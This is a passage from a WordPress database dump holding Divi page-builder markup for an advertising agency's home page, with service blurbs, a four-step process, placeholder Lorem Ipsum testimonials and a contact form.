custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12.png\" alt=\"Best Advertising agency\" title_text=\"best advertising agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5.jpg\" alt=\"marketing strategy\" title_text=\"marketing strategy\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-06 20:54:49','2020-08-06 20:54:49','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/06/134-revision-v1/',0,'revision','',0),(450,1,'2020-08-06 21:06:50','2020-08-06 21:06:50','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" 